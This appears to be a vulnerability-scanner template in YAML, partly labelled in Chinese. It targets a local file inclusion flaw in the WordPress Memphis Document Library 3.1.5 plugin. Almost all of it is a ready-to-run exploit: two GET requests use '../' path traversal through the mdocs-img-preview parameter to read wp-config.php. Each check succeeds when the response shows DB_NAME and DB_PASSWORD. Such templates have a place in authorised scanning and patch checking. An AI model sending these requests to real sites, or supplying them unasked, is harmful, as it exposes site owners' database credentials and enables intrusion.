product: WordPress
vName: WordPress Memphis Document Library 3.1.5 - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: WordPress Memphis Document Library 3.1.5 is vulnerable to local file inclusion.
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/39593
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /mdocs-posts/?mdocs-img-preview=../../../wp-config.php
    verify:
      logic: and
      check:
        - body:
            value:
              - DB_NAME
              - DB_PASSWORD
            logic: and
        - status: 200
  - exp:
      method: get
      follow: false
      path: /?mdocs-img-preview=../../../wp-config.php
    verify:
      logic: and
      check:
        - body:
            value:
              - DB_NAME
              - DB_PASSWORD
            logic: and
        - status: 200
